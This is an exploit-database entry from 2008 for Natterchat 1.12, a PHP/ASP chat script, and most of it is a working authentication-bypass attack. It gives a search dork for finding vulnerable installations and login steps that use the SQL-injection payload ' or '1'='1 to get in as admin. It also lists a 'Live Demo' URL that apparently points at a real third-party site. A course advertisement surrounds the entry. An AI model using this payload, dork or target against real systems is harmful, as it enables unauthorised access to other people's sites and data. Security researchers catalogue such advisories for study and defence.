Natterchat 1.12 - Authentication Bypass

EDB-ID:

7175


Author:

Stack

Type:

webapps


Platform:

PHP

Date:

2008-11-20


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

[+] Script Name         : Natterchat v1.12 (Auth Bypass) Remote SQL Injection Vulnerability
[+] Author         : Mountassif Moad
[+] Dork           : Powered by Natterchat v1.12

[+] Expl0iT :
1) Go to the Login page http://www.site.il/chat/nattechat/home.asp
2) Username : admin 
   Password : ' or '1'='1

Live Demo
http://www.sprq.ca/cgi-bin/natterchat/chat.asp

# milw0rm.com [2008-11-20]